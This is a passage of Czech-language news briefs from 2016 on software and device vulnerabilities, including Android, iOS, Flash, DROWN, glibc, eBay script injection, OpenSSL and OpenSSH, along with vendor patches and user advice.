Chybu mohou počítačoví piráti zneužít dvěma různými způsoby. V první řadě mohou na dálku restartovat zařízení, a tím odpojit všechny připojené počítače od internetu až na tři minuty. A to samozřejmě opakovaně.

Daleko horší ale je, že trhlina jim dovoluje také obnovit na dálku tovární nastavení této brány do světa internetu. Co to znamená v praxi? Je jedno, jak má uživatel sofistikované přístupové heslo, tímto krokem jej kyberzločinci jednoduše smažou. Pak už jen stačí naťukat přednastavené defaultní hodnoty, které klidně vyčtou z volně dostupných návodů na internetu.

Jediný způsob, jak se mohou lidé bránit, je odpojit modem od internetu.
Swati Khandelwal ze serveru The Hacker News
„Chyba je velmi nešťastná. Jediný způsob, jak se mohou lidé bránit, je odpojit modem od internetu,“ uvedl Swati Khandelwal ze serveru The Hacker News. Podle něj totiž v současnosti neexistuje pro trhlinu žádná oprava.

Výrobce routeru – společnost Arris – se zatím k problému oficiálně nevyjádřil. Není tedy jasné ani to, zda pracuje na aktualizaci firmwaru, která by zjednala nápravu.

Nabízí se také otázka, zda podobnou chybu neobsahují i další síťové prvky tohoto výrobce.

Útoků na síťové prvky přibývá
Právě na síťové prvky, jako jsou modemy a routery, se počítačoví piráti v poslední době zaměřují stále častěji. A není se čemu divit. Březnová studie Cisco Annual Security Report ukázala, že devět z deseti internetových zařízení má slabá místa.

Když kyberzločinci získají přístup k routeru nebo modemu, dokážou napáchat daleko větší neplechu, než kdyby propašovali nezvaného návštěvníka jen do počítače. S pomocí škodlivých kódů, jež do těchto síťových prvků nahrají, mohou například odposlouchávat komunikaci nebo přesměrovávat internetové adresy. [celá zpráva]

Přesně to udělali už v minulosti díky zranitelnosti známé jako „rom-0“. Místo serverů, jako jsou například Seznam.cz nebo Google.com, se poškozeným zobrazila hláška o nutnosti instalace flash playeru. Místo té se ale do PC stáhnul další virus. Útočníci tak rázem měli přístup nejen k routeru, ale i k připojenému počítači.

Google opravil 39 chyb v Androidu, 15 kritických

7.4.2016 Zranitelnosti
Uživatelé Androidu se mohou cítit bezpečněji, Google vydal rozsáhlou bezpečnostní aktualizaci systému.

Google vydal jednu z největších měsíčních aktualizací Androidu, opravující 39 chyb, z nichž 15 bylo vyhodnoceno jako kritických a 4 mohly vést až k úplné ztrátě kontroly nad systémem.

Součástí je i oprava chyby označované jako CVE-2015-1805, na kterou Google upozornil před dvěma týdny a které lze zneužít i prostřednictvím veřejně dostupné rootingové aplikace.

Jak se v posledních měsících ukazuje, komponenty, jejichž prostřednictvím Android zpracovává média, jsou častým zdrojem závažných mezer – aktuální aktualizace obsahuje rovnou devět patchů pro chyby související s media codecem, mediaserverem nebo knihovnou pro práci s multimédii (Stagefright), jichž byl schopný hacker zneužít k úplnému ovládnutí přístroje.

Další komponenty, kterých se nápravná aktualizace týká, zahrnují Android Kernel, DHCP klient či moduly Qualcomm. Patchování se však týká i méně závažných chyb, které však například prostřednictvím Bluetoothu či nejrůznějších ovladačů, mohly aplikacím dávat větší práva, než jaká vyžadovaly oficiálně.

Podle Googlu však žádná z těchto chyb, vyjma CVE-2015-1805, zneužita nebyla nebo alespoň o tom společnost nemá žádné informace.

Na chybovost systému dohlíží takzvaný Android Security Team, a to prostřednictvím bezpečnostních systémů Verify Apps a SafetyNet – první skenuje zařízení na hrozby pramenící z aplikací stažených na Google Play, druhý z aplikací stažených mimo Google Play.

Samotný Android je však ve svých novějších verzích čím dál tím bezpečnější a jestliže s aktualizací přijde některý z výrobců, uživatelé jsou vyzýváni k tomu, aby ji instalovali pokud možno co nejdříve.

Nebezpečná chyba v operačním systému iOS ohrožuje milióny uživatelů

31.3.2016 Zranitelnosti
Bezpečnostní analytici společnosti Check Point odhalili novou vážnou zranitelnost v operačním systému iOS od společnosti Apple, který využívají chytré telefony iPhone i počítačové tablety iPad. Chybu mohou útočníci zneužít k tomu, aby na napadené zařízení propašovali prakticky jakýkoliv škodlivý kód.
Chyba dostala pracovní název SideStepper. Útočníkům umožňuje zneužít komunikaci mezi jablečným telefonem nebo tabletem a tzv. MDM systémem. Jde v podstatě o řešení, které je především ve firmách využíváno pro vzdálenou instalaci aplikací a správu zařízení Apple.

Právě kvůli chybě v této komunikaci si útočníci s napadeným přístrojem mohou dělat, co je napadne. „Útočníci mohou zranitelnost zneužít například ke vzdálené instalaci škodlivých aplikací a ohrozit veškerá data v zařízení. Potenciálně tak mohou být ohroženy milióny iOS uživatelů po celém světě," řekl pro Novinky.cz David Řeháček, bezpečnostní odborník ze společnosti Check Point Software Technologies.

Útočí přes SMS i sociální sítě
Případný útok by mohl podle něj vypadat následovně. „Nejdříve přesvědčí uživatele k instalaci škodlivého konfiguračního profilu, například prostřednictvím phishingové zprávy. Jedná se o jednoduchý a efektivní způsob útoku, který využívá pro šíření škodlivého odkazu osvědčené komunikační platformy, jako jsou SMS, chatovací programy nebo e-mail. Útočníci pak mohou napodobovat příkazy, kterým iOS věří, a instalovat vzdáleně další škodlivé aplikace,“ doplnil Řeháček.

Prostřednictvím nich pak mohou uživatele odposlouchávat, odchytávat přihlašovací údaje a další citlivá data. Stejně tak ale mohou na dálku aktivovat kameru či mikrofon, aby zachytili zvuky a obrazy.

Detaily o nové zranitelnosti byly ve čtvrtek odpoledne zveřejněny na bezpečnostní konferenci Black Hat Asia. Případní počítačoví piráti tak mají v rukou prakticky vše, co potřebují, aby mohli trhlinu zneužít.

Doposud však nebyl zaznamenán žádný případ zneužití nově objevené zranitelnosti.

Obezřetnost je namístě
I když oprava chyby SideStepper zatím chybí, uživatelé mohou vcelku jednoduše minimalizovat riziko napadení sami. Stačí neotvírat SMS zprávy a e-maily od neznámých lidí, to samé platí o zprávách na sociálních sítích a v nejrůznějších chatovacích programech. Právě těmito kanály totiž počítačoví piráti útočí nejčastěji.

Na mobilní platformu iOS se v poslední době zaměřují kyberzločinci stále častěji. Tento měsíc například bezpečnostní experti varovali před trojským koněm AceDeceiverem, který dokáže v jablečných zařízeních udělat poměrně velkou neplechu. Otevře totiž pirátům zadní vrátka do systému, čímž jim zpřístupní nejen nastavení, ale také uživatelská data.

Adobe updatuje Flash, kritická chyba dovolovala ovládnutí počítače

13.3.2016 Zranitelnosti
Adobe updatuje Flash, kritická chyba dovolovala ovládnutí počítačeDnes, Milan Šurkala, aktualitaKdysi velmi populární Flash se pomalu opouští a není divu. Vedle nepříliš dobrého výkonu má také spoustu bezpečnostních chyb. Poslední update opravuje např. chybu CVE-2016-1010, která dovolila útočníkům převzít kontrolu nad počítačem.
Adobe Flash je čím dál v menší oblibě. Prvně je nahrazován HTML5, za druhé přináší spoustu bezpečnostních děr a poslední aktualizace (např. 21.0.0.182 pro Windows a Mac OS) opravuje celkem 23 bezpečnostních chyb, z nichž mnohé byly označeny jako kritické. Např. chyba CVE-2016-1010 dovolila převzít kontrolu nad počítačem a to se týkalo i mnoha dalších. Navíc jsou známy případy, kdy tato chyba byla využita ke skutečným útokům.

Společnost Adobe tedy doporučuje urychlený update na nejnovější verze tohoto přehrávače napříč všemi platformami. Týká se to tedy Windows, Mac OS, Linuxu i verzí pro mobilní telefony a jejich operační systémy.

Flash opět obsahuje kritické chyby, podle Adobe je už používají útočníci

12.3.2016 Zranitelnosti

Firma vydala mimořádné opravy více než dvacítky chyb, řada z nich je kritických, takže potenciálním útočníkům umožňují získat vládu nad systémem.
Není to velké překvapení – tím by spíš bylo, kdyby Flash vydržel delší dobu bez zásadních bezpečnostních incidentů. Adobe aktuálně doporučuje aktualizovat Flash Player na nejnovější verzi – pokud tak neučiníte, vystavujete se riziku napadení svého zařízení.

Jednu z chyb už podle firmy útočníci využívají. „Adobe má informace o tom, že chyba CVE-2016–1010 je aktivně zneužívána v omezeném počtu cílených útoků,“ přiznává na svém blogu.

Zatím neupřesněná chyba podle firmy může vést k tomu, že útočník bude schopný na zařízení spouštět svůj kód.

Adobe tak doporučuje updatovat Flash Player na verzi 21.0.0.182 (Windows a Mac), respektive 11.2.202.577 (Linux). Pokud ovšem Flash Player ve svém zařízení nutně nepotřebujete, je nejlepší jej úplně odinstalovat.

Flash je tak jako tak na ústupu. Google nedávno oznámil, že jeho reklamní systémy od léta přestanou přijímat flashové bannery, jeho podporu omezují i prohlížeče a v mobilních zařízeních si beztak ani neškrtne.

Chrome i Flash Player obsahují nebezpečné trhliny

10.3.2016 Zranitelnosti
Obezřetní by měli být uživatelé internetu při prohlížení videí i webových stránek. Programy Google Chrome a Adobe Flash Player, které k této činnosti slouží, totiž obsahují nebezpečné trhliny. Záplaty jsou však naštěstí již k dispozici.
Tvůrci webového prohlížeče Chrome už minulý týden vydávali velký balík oprav, který sloužil jako záplata pro více než dvě desítky zranitelností, připomněl server Security Week.

Aktualizace z tohoto týdne opravuje pouze tři trhliny, přesto by s jejich instalací neměli uživatelé zbytečně otálet. Vývojáři totiž jejich důležitost označují jako vysokou. Takovéto chyby zpravidla mohou počítačoví piráti zneužít k propašování škodlivých virů do cizích počítačů.

Chyby jsou obsaženy v Chromu pro Windows, Linux i pro Mac OS X.

Propašovat mohou prakticky libovolný virus
Trhlinám v zabezpečení se nevyhnul ani oblíbený program Flash Player od společnosti Adobe. Ten slouží k přehrávání videí na internetu a na celém světě jej používají milióny lidí. Právě proto se na něj kyberzločinci zaměřují pravidelně a nové aktualizace vycházejí prakticky měsíc co měsíc.

Objevená zranitelnost může vést ke vzdálenému spuštění kódu, tedy k instalaci prakticky jakéhokoliv viru na cizím počítači. Ohroženi jsou přitom majitelé prakticky všech aktuálně dostupných operačních systémů.

Adobe navíc záplatovala tento týden také své další produkty – Acrobat, Reader a Digital Edition.

Chyby jsou i ve Windows a Internet Exploreru
V případě automatických aktualizací se uživatelé Chromu ani programů od Adobe nemusejí o nic starat. Pokud je však tato funkce vypnuta, je nutné navštívit webové stránky tvůrců a nejnovější záplatovanou verzi stáhnout manuálně.

Na pozoru by se měli mít také uživatelé operačního systému Windows a webových prohlížečů Internet Explorer a Edge. Také v nich byly objeveny kritické chyby. Microsoft je tento týden opravil v rámci pravidelných aktualizací, které vycházejí vždy druhé úterý v měsíci.

Outlook už e-maily nemaže. Microsoft opravil nepříjemnou chybu

9.3.2016 Zranitelnsoti
Uživatelé poštovního klienta Outlook se v minulých dnech mohli setkat s nepříjemnou chybou, kvůli které se mazaly e-maily ze serveru. Díky nové opravě to však už nehrozí. Microsoft vydal aktualizaci v úterý.
Novinky.cz o chybě informovaly minulý týden po upozornění jednoho z čtenářů. [celá zpráva]

Vývojáři z Microsoftu o chybě věděli jen o několik dnů déle. To jinými slovy znamená, že na vytvoření záplaty jim stačily necelé dva týdny. Běžně se v takto krátkém čase řeší trhliny týkající se bezpečnosti uživatelů, o což v tomto konkrétním případě vůbec nešlo.

Microsoft Outlook 2016

Chyba se týkala pouze protokolu POP3
Chyba se týkala pouze uživatelů Outlooku 2016, kteří používali poštovní protokol POP3. Ten funguje tak, že uživateli se do počítače nebo chytrého telefonu stáhnou všechny e-maily a bez ohledu na to, zda je časem smaže či nikoliv, zůstanou uchovány na serveru.

Problém byl ale v tom, že v nejnovější verzi poštovního klienta od společnosti Microsoft byly e-maily mazány ze serveru okamžitě. A to i v případě, že v něm bylo nastaveno, že tak má učinit až po nějaké době.

Stahovat aktualizaci je možné prostřednictvím služby Windows Update.

Triviální chyba umožňovala krádeže účtů na Facebooku opakovaným hádáním hesla

9.3.2016 Zranitelnosti
Triviální chyba umožňovala krádeže účtů na Facebooku opakovaným hádáním hesla
Indický bezpečnostní inženýr Anand Prakash objevil závažnou zranitelnost v zabezpečení největší sociální sítě. Umožňovala změnu hesla oběti jen za pomoci hrubé síly.

Zranitelnost se nacházela v mechanismu obnovy zapomenutého hesla. Uživatel má v takovém případě možnost zaslání kódu pro obnovení hesla přes e-mail nebo telefon. Šestimístné číslo následně zadá přímo na Facebooku, přičemž nastaví heslo nové.

Síť podle Prakash blokuje zadávání kódu po 10 až 12 neúspěšných pokusech. Omezení se však dalo obejít přístupem přes adresy beta.facebook.com či mbasic.beta.facebook.com, kde nebylo implementováno. Útočník tak mohl hádáním číselných kombinací získat přístup k cílenému účtu. Znamená to sice milion možností, ale pro automatický skript by to byla jednoduchá, výkonově nenáročná úloha.

Po nastavení nového hesla se hacker přihlásí do účtu za pomoci e-mailu nebo telefonního čísla dané osoby. Může jít o známé údaje zejména v případech, kdy svou oběť zná.
Facebook se o chybě dozvěděl 22. února a chybu ihned s přispěním Prakashe opravil. Ind na oplátku dostal odměnu ve výši 15 tisíc amerických dolarů (370 tisíc korun).

Nebezpečná chyba DROWN je na 11 miliónech webů. V Česku jsou jich tisíce

7.3.2016 Zranitelnosti
Chyba DROWN, kterou mohou počítačoví piráti zneužít k odposlouchávání šifrované komunikace, se týká 11 miliónů webových stránek po celém světě. Upozornil na to server News Factor. V České republice jsou serverů, jež mohou být takto zneužity, tisíce.
O nebezpečné chybě DROWN informovaly Novinky.cz již minulý týden. [celá zpráva]

Už tehdy se hovořilo o tom, že zranitelnost se týká třetiny internetu. Přesné vyčíslení potencionálně nebezpečných serverů však ještě nebylo k dispozici.

S ohledem na 11 miliónů serverů po celém světě, které obsahují chybu DROWN, se zranitelnost logicky dotýká také podstatné části webů v České republice.

„Podle informací, které jsme doposud obdrželi, se problém týká téměř 13 000 IP adres. Všechny provozovatele těchto adres jsme již o tomto problému informovali,“ uvedla pro Novinky.cz analytička Zuzana Duračinská z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.

Jakých konkrétních webů se chyba týká, však neuvedla. To je vcelku logické, protože jinak by počítačoví piráti získali přehled o tom, na jaké servery se mohou zaměřit.

Uživatelé se bránit nemohou
Duračinská zároveň připomněla, že samotní uživatelé se proti útoku nemohou bránit. „Na straně uživatelů bohužel není možné se jakkoliv bránit. Potřebná opatření musí udělat dotčení provozovatelé služeb,“ doplnila.

Jediné, co mohou uživatelé dělat, je servery obsahující chybu nepoužívat. Ověřit, zda server obsahuje chybu DROWN je možné například zde. Stačí do kolonky vepsat požadovanou adresu a kliknout na tlačítko „Check for DROWN vulnerability”. Systém během chvilky vyhodnotí, zda daný web trhlinu obsahuje, či nikoliv.

Zranitelné mohou být webové stránky, mailové servery a jiné služby.
bezpečnostní analytik týmu CSIRT Pavel Bašta
Chyba se totiž týká šifrované komunikace, konkrétně staršího protokolu SSLv2. Právě kvůli tomu mohou zranitelnost opravit pouze provozovatelé serverů, nikoliv samotní uživatelé. Při návštěvě zranitelných stránek tak uživatelé nemusejí ani vědět, že něco není v pořádku.

Pokud se přihlašují na server, který obsahuje chybu, může být komunikace odposlouchávána. Když tedy zadají na počítači například přihlašovací údaje k internetovému bankovnictví, kyberzločinci se k nim mohou dostat díky chybě DROWN v podstatě ještě dřív, než dorazí na samotný server.

„Zranitelné mohou být webové stránky, mailové servery a jiné služby, které protokol TLS využívají,“ uvedl již dříve bezpečností analytik týmu CSIRT Pavel Bašta.

Nebezpečná chyba ohrožuje třetinu internetu. Uživatelé se bránit nemohou

6.3.2016 Zranitelnosti
Bezpečnostní experti odhalili novou nebezpečnou trhlinu zvanou DROWN, která může být zneužita k napadení šifrované komunikace na webu. Kyberzločinci tak mohou snadno odposlouchávat přístupové údaje včetně hesel, nebo například čísla kreditních karet i s ověřovacími prvky. Zranitelnost se týká třetiny internetu, uvedl Národní bezpečnostní tým CSIRT.CZ.
Hlavní problém je v tom, že uživatel se před chybou nemůže nijak bránit. Zatímco před nejrůznějšími viry a trojskými koni jej dokážou ochránit antivirové programy, na zranitelnost DROWN jsou bezpečnostní aplikace krátké.

Chyba se totiž týká šifrované komunikace, konkrétně staršího protokolu SSLv2. Právě kvůli tomu mohou zranitelnost opravit pouze provozovatelé serverů, nikoliv samotní uživatelé. Při návštěvě zranitelných stránek tak uživatelé nemusejí ani vědět, že je něco v nepořádku.

V ohrožení e-mailová komunikace i bankovnictví
„Zranitelné mohou být webové stránky, mailové servery a jiné služby, které protokol TLS využívají,“ konstatoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Ten zároveň detailně popsal, jak může být chyba zneužita: „K využití DROWN zranitelnosti může dojít v případě, že služba umožňuje využívaní SSLv2 a TLS zároveň nebo je soukromý klíč využíván ještě na jiném serveru, který podporuje SSLv2. Výsledkem úspěšného zneužití zranitelnosti může být prolomení TLS komunikace mezi serverem a uživatelem.“

Co to znamená pro uživatele v praxi? I když se pohybují na zabezpečených stránkách, například v e-mailové schránce nebo v internetovém bankovnictví, neznamená to, že je jejich komunikace skutečně bezpečná.

Komunikace může být odposlouchávána
Pokud se přihlašují na server, který obsahuje chybu, může být komunikace odposlouchávána. Když tedy zadají na počítači například přihlašovací údaje k internetovému bankovnictví, kyberzločinci se k nim mohou dostat díky chybě DROWN v podstatě ještě dříve, než dorazí na samotný server.

Trhlinu přitom obsahuje nezanedbatelná část webů po celém světě. „Podle předběžných odhadů je zranitelných až 33 % stránek využívajících HTTPS protokol,“ doplnil Bašta.

Jakých konkrétních webů se zranitelnost DROWN týká, však neuvedl. Je nicméně více než pravděpodobné, že jen v České republice budou tisíce serverů obsahujících chybu.

Otázka je, jak rychle dokážou poskytovatelé jednotlivých služeb zareagovat a své systémy skutečně opravit. Bezpečnostní experti o tom vědí své, i přes závažnost Chyby krvácejícího srdce příslušnou záplatu nenainstalovala ani rok po objevení více než polovina firem po celém světě.

Kvůli Chybě krvácejícího srdce mohli útočníci disponovat například přihlašovacími uživatelskými údaji, a to včetně soukromých hesel k e-mailům, sociálním sítím, on-line bankovnictví nebo nejrůznějším internetovým obchodům. Vzhledem k tomu, že řada účtů je navázána na platební karty, byla hrozba nebezpečí o to závažnější.

Mezi postiženými byly i velké portály, jako jsou například Yahoo.com, Flickr.com či Mail.com. I proto se podle BBC jednalo o jednu z nejzávažnějších bezpečnostních trhlin v historii internetu. Chyba, která by v takovém rozsahu vystavila internet potenciálním útokům, se totiž zatím nikdy neobjevila.

Apple vydal záplatu záplaty. Po aktualizaci lidem přestal fungovat internet

3.3.2016 Zranitelnosti
Bezpečnostní experti uživatelům neustále radí, jak je důležité mít aktualizovaný operační systém, aby se do něj přes nalezené trhliny nedostali žádní nezvaní návštěvníci. Jenže všechny aktualizace se ne vždy povedou, jak se na vlastní kůži v minulých dnech přesvědčili uživatelé počítačů od Applu. Bezpečnostní záplata jim totiž zablokovala internetové připojení.
Problém se týkal uživatelů, kteří používají operační systém OS X El Capitan. Sluší se zmínit, že právě na této verzi funguje drtivá většina notebooků a stolních počítačů od amerického počítačového gigantu. Ten totiž vždy nejnovější verzi systémů nabízí uživatelům jako bezplatnou aktualizaci.

Na minulý týden byla pro El Capitana vydána bezpečnostní záplata, která opravovala chybu týkající se samotného jádra systému. Tu mohli kybernetičtí zločinci zneužít k propašování prakticky libovolného viru na napadený počítač, nebo jej na dálku klidně i ovládnout.

Oprava vyšla během pár dní
S instalací aktualizace tak většina uživatelů z pochopitelných důvodů neotálela. Problém však nastal po instalaci, přestalo totiž fungovat připojení k internetu prostřednictvím ethernetové zástrčky (klasického síťového rozhraní), upozornil server Security Week.

Programátoři amerického počítačového gigantu proto neváhali a během pár dní vydali záplatu záplaty. „Společnost Apple o víkendu vydala opravu bezpečnostní záplaty pro systém OS X El Capitan,“ uvedl bezpečnostní analytik Pavel Bašta z týmu Národního bezpečnostního týmu CSIRT.

Podle něj po instalaci nejnovější aktualizace začne internetové připojení opět fungovat.

Apple opravuje chyby v Apple TV. Útočníci přes ni mohli tahat data

2.3.2016 Zranitelnosti
Zhruba 60 chyb opravila společnost Apple ve své chytré krabičce pro „hloupé televize“ Apple TV. Chyby se nahromadily i proto, že firma přistoupila k updatu systému poprvé od loňského dubna. Nová verze systému třetí generace má označení 7.2.1. Firma vydala i dvě záplaty pro čtvrtou generaci Apple TV, která běží na systému tvOS.

Jak píše server Security Week, některé chyby jsou tak závažné, že je mohli útočníci zneužít k spuštění závadného kódu nebo ukradení informací. Stejné chyby, jaké mají aplikace v Apple TV, přitom již firma řešila u stejných aplikací v jiných operačních systémech.

Apple TV je děravá jako ementál. Odhaleny byly desítky nebezpečných chyb

29.2.2016 Zranitelnosti
Více než šest desítek bezpečnostních trhlin bylo objeveno v multimediálním centru Apple TV. Některé z objevených trhlin mohli počítačoví piráti zneužít k průniku do zmiňovaného zařízení. Opravy trhlin jsou však již k dispozici.
Nebezpečné chyby se týkají multimediálních center, ve kterých běží starší operační systém tvOS, než je verze 7.2.1. Právě toto vydání obsahuje záplaty pro všechny odhalené zranitelnosti.

Trhliny se týkaly takřka dvou desítek předinstalovaných aplikací, ale například i samotného jádra této televizní platformy, uvedl server Security Week.

Piráti mohli uživatele klidně i odposlouchávat, aniž by si toho všiml
Chyby mohli kybernetičtí nájezdníci zneužít k tomu, aby se dostali k uloženým citlivým informacím, aby způsobili pád určitých aplikací, případně aby spustili libovolný škodlivý kód. To jinými slovy znamená, že mohli uživatele klidně i odposlouchávat, aniž by si toho všiml.

Žádné zneužití chyb ze strany počítačových pirátů však zatím nebylo prokázáno. Přesto bezpečnostní experti upozorňují, že riziko nebylo malé.

Aktualizace přišly až po roce
Problém byl podle bezpečnostních expertů především v tom, že Apple nezáplatoval nebezpečné díry průběžně.

Předchozí verze vyšla loni v dubnu, tedy v podstatě téměř před rokem. Proti tomu například aktualizace pro iPhony a iPady jsou vydávány skoro každý měsíc. Kyberzločinci díky tomu nemají tolik času si systém pořádně „proklepnout“.

Apple TV je v podstatě malá krabička, která je vybavena wi-fi modulem, ethernetovým portem a HDMI výstupem. U televizoru nahrazuje funkce multimediálního centra, do nejnovější verze je ale navíc možné instalovat i aplikace. Nechybí v ní ani virtuální asistentka Siri.

Tisíce linuxových programů i celé distribuce nejspíše trpí kritickou chybou
17.2.2016 Zranitelnosti

GNU C Library 2.9 a vyšší (glibc), standardní knihovna jazyka C především na linuxových systémech, trpí posledních osm let kritickou chybou CVE-2015-7547, která umožní spuštění škodlivého kódu. Chyby si nezávisle na sobě všimlo několik specialistů z Red Hatu a Googlu, kteří se s ní pochlubili na svém bezpečnostním blogu.

Inženýři z Googlu narazili na chybu poté, co jejich SSH klient spadl pokaždé, když se pokusil spojit s určitým počítačem v síti. Programátoři si nejprve mysleli, že je problém v jejich programu, postupem času ale přišli na to, že viníkem je přímo glibc a jeho funkce getaddrinfo(), která se stará o DNS překlad doménového jména na IP adresu.

90426727
Test od Googlu a pád aplikace. Systém je děravý (Foto: Kenn White pro Ars Technica)

Určité doménové jméno, případně chování DNS serveru, může při překladu vyvolat přetečení zásobníku (buffer overflow), což povede k chybě typu segmentation fault, které by mohl využít útočník ke spuštění vlastního záškodnického kódu.

Inženýři z Googlu pro tyto případy připravili i test, na kterém lze vyzkoušet, jestli je daný systém náchylný k útoku. Test se skládá z drobného kódu v C, který volá funkci getaddrinfo(), a skriptu v Pythonu, který bude simulovat záškodníka. Zdrojové kódy testu jsou k dispozici na GitHubu. Pokud po spuštění nedojde k pádu aplikace, váš systém je bezpečný.

Potenciálně obrovské riziko

Jelikož je chyba v klíčové knihovně programovacího jazyka C, týká se ohromného množství linuxového softwaru, který byl napsán s využitím glibc 2.9 a vyšší a používá DNS dotazy, což je případ prakticky všech linuxových distribucí, populárních programů wget, curl, sudo, interpretů PHP, Python a tak dále a tak dále.

Dobrá zpráva pro majitele Androidu: Jeho kódy jsou napsané pomocí odnože glibc jménem Bionic a chyba se jej netýká

Oprava chyby může být poměrně složitá. Starší software napsaný pomocí problematické knihovny si totiž nese chybu ve svém vlastním kódu, a pokud jej už nikdo neudržuje, bude napadnutelný i nadále. Zatímco software na linuxových pracovních stanicích a serverech je zpravidla průběžně aktualizovaný, takové síťové krabičky v čele se staršími domácími Wi-Fi routery aj. bez automatické aktualizace se nicméně nyní mohou dostat do hledáčků útočníků, kteří dostali novou zajímavou zbraň. Stačí, abyste na podobně napadnutelném zařízení použili třeba jejich záškodnický DNS server a budou mít hostinu.

Ačkoliv se často vysmíváme Windows a některým chybám, se kterými se museli v Microsoftu vypořádat, jedná se o průběžně aktualizovaný OS. Miliony síťových krabiček s linuxovým jádrem uvnitř, jejichž aktualizace již dávno nikdo neřeší, jsou v případě podobných chyb potenciální cestou do pekel. O to důležitější je, aby nastupující IoT naprosto automaticky předpokládal průběžnou bezpečnostní aktualizaci firmwaru.

Kauza svým potenciálem připomíná chybu Heartbleed z jara roku 2014, která iniciovala lepší financování auditů kódu klíčovéého open-source softwaru. Jeho teoretická bezpečnostní výhoda oproti tomu proprietárnímu totiž skutečně spočívá v tom, že na kód může každý nahlédnout a hledat chyby, důkladná analýza rozsáhlých projektů ovšem vyžaduje čas a zdatné experty, takže nakonec stojí peníze, a proto zase není až takovou samozřejmostí, jak by leckdo pomyslel.

eBay se nechystá opravit vážnou chybu ohrožující jeho uživatele

9.2.2016 Zranitelnosti

Poměrně zásadní bezpečnostní chyba zjištěná společností Check Point se prý opravovat nebude. Zvláštní přístup.
V polovině prosince objevili v Check Pointu chybu na eBay. Až natolik závažnou, že je zneužitelná pro vsunutí JavaScriptu do kódu obchodu, který si kdokoliv na eBay může založit. Pomocí vloženého kódu pak může do počítačů uživatelů stahovat další JavaScript z vlastních serverů a dělat, co se mu zlíbí.

Konkrétnější informace o bezpečnostním nedostatku můžete najít například v eBay Platform Exposed to Severe Vulnerability. Jde vlastně o jednu z nejklasičtějších věcí, kterou je nutné ošetřit ve všech systémech, které umožňují uživatelům vkládat data a ta poté zobrazit jiným uživatelům. „Script injection“, tedy vsunutí skriptingu, je základ, který každý informační systém přístupný z internetu řeší (stejně jako mírně související SQL injection).

aBay přitom klasické způsoby vkládaní skriptů ošetřené má (stejně jako vkládání rámců), ale ne moment, kdy je použita speciální cesta, jak kontrolu obejít. Ta funguje tak, že vsouvá kód, aniž by k tomu potřebovala klasické způsoby, ale vystačí si velmi zvláštním způsobem konstruujícím výsledný kód s pomocí pouhých šesti znaků – [], (), + a !. Detailní informace o tom, jak to celé funguje, najdete ve výše uvedeném oznámení od Check Pointu (a příklad na obrázku níže).

Na celém objevu je nakonec nejpodstatnější to, že z eBay 16. ledna odepsali, že se chybu nechystají řešit. Uvážíme-li, že v tuto chvíli jsou detaily o možném zneužití snadno dostupné a nic nebrání jejich masovému zneužívání, je to dost zvláštní rozhodnutí.
Prohlížeč nepodporuje vložené rámce nebo je nyní nakonfigurován tak, aby je nezobrazoval.

Server The Next Web se pokusil získat z eBay nějaké dodatečné informace a dostal jedno z nejklasičtějších a nejhloupějších vyjádření: eBay nebude nic dělat, protože neobjevili žádné aktivity, které by tuto zranitelnost využívaly.

eBay is committed to providing a safe and secure marketplace for our millions of customers around the world. We take reported security issues very seriously, and work quickly to evaluate them within the context of our entire security infrastructure. We have not found any fraudulent activity stemming from this incident.

A jako zlatý hřeb je tiskové oddělení ujistilo o tom, že škodlivý kód na jejich platformě je vzácný, protože se prý vyskytuje v „méně než dvou výpisech z milionu“, které obsahují aktivní obsah.

Chyba krvácejícího srdce podruhé? Šifrovací knihovna OpenSSL má další závažnou chybu

27.1.2016 Zranitelnosti
V šifrovací knihovně OpenSSL, která patří k nejrozšířenějšímu kryptovacímu softwaru na internetu, byly nalezeny dvě zranitelnosti. Jedna z nich je přitom označována za velice vážnou. Mohou ji tedy zneužít počítačoví piráti k proniknutí do cizích systémů, podobně jako tomu bylo předloni u Chyby krvácejícího srdce (The Heartbleed Bug).
Detaily o chybě tvůrci zatím tají. To je ale vcelku logické, protože počítačoví piráti by je mohli zneužít k útokům na dosud nezáplatované systémy.

Jisté je tak v současnosti pouze to, že trhlina má „vysokou závažnost“. Je tedy o něco méně nebezpečná než kritické chyby, ale stejně tak ji mohou kyberzločinci zneužít. U takovýchto chyb se pouze nepředpokládá, že by je mohli hackeři snadno odhalit sami.

Záplata nicméně vyjde ještě tento týden. „Nová verze, ohlášená na čtvrtek 28. ledna, bude opravovat obě zranitelnosti,“ konstatoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Otázka je, jak rychle dokážou poskytovatelé jednotlivých služeb zareagovat a systémy využívající knihovnu OpenSSL skutečně opravit.

Chyba se dotkla dvou třetin internetu
Bezpečnostní experti o tom vědí své, i přes závažnost Chyby krvácejícího srdce příslušnou záplatu nenainstalovala ani rok po objevení více než polovina firem po celém světě. Ta byla rovněž objevena v knihovně OpenSSL a dotkla se dvou třetin celého internetu, protože OpenSSL patří k nejrozšířenějšímu kryptovacímu softwaru na internetu. [celá zpráva]

OpenSSH obsahuje chybu umožňující ukrást klientské klíče

15.1.2016 Zranitelnosti

V OpenSSH byla objevena vážná bezpečnostní chyba, která umožňuje serveru vylákat z klienta jeho privátní šifrovací klíče. S jejich pomocí se pak za klienta dokáže vydávat a přihlásit se tak k dalším zdrojům. Pikantní přitom je, že chyba zneužívá nedokumentovanou funkci roaming, kterou servery neumí.

Bezpečnostní tým společnosti Qualys objevil vážnou zranitelnost v klientech OpenSSH. Dovoluje zlému či napadenému SSH serveru získat privátní šifrovací klíče používané k přihlašování. Zneužívá se při tom nedokumentovaná funkce „roaming“, která slouží k opětovnému navázání rozpadlého SSH spojení. Pikantní na této funkci je, že ji server vůbec neimplementuje a není tedy možné ji použít. Přesto je ve výchozím stavu zapnutá a kvůli chybě ohrožuje bezpečnost klientů.

Problém se přitom týká všech verzí, které funkci roaming obsahují – tedy od verze 5.4 (březen 2010) až po 7.1. Chyba byla 11. ledna nahlášena vývojářům OpenSSH, kteří během tří dnů vydali patch a poté teprve byl popis chyby odhalen veřejnosti. Celkem se jedná o dvě chyby označené jako CVE-2016–0777 a CVE-2016–0778, první z nich může za samotný únik dat, druhá dovoluje buffer overflow.

Odpovídající kód pro serverovou část nebyl nikdy vydán, ale klientská část je ve výchozím stavu zapnutá a může být zákeřným serverem zneužita k vylákání paměti obsahující privátní klíče, píše se v oficiálním oznámení.

